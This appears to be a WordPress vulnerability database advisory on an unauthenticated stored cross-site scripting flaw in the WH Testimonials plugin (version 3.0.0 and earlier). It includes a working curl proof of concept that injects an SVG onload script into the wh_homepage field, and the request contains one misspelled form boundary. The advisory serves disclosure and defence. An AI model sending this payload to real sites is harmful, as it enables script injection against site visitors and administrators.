WordPress Plugin Vulnerabilities
WH Testimonials <= 3.0.0 - Unauthenticated Stored XSS
Description
The plugin does not sanitise and escape the wh_homepage, wh_text_short and wh_text_full parameters of submitted Testimonials, which could allow unauthenticated attackers to perform Stored Cross-Site Scripting attacks
Proof of Concept
curl -X POST 'http://example.com/add/' \ -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLKXxMfAqKI63OgZ4' \ -H 'Host: example.com' \ -H 'Content-Length: XXX' \ -d $'------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_clientname"\r\n\r\nFirst Name\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_company"\r\n\r\nLast Name\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_homepage"\r\n\r\n\"><svg/onload=prompt(/XSS/)>\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_text_short"\r\n\r\nShort Review\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_text_full"\r\n\r\nLong Review\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_sfimgurl"; filename=""\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormsoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="Wh_addnew"\r\n\r\nAdd Testimonial\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4--\r\n'
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Daniel Kelley
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-03-11 (about 1 years ago)
Added
2023-03-13 (about 1 years ago)
Last Updated
2023-03-13 (about 1 years ago)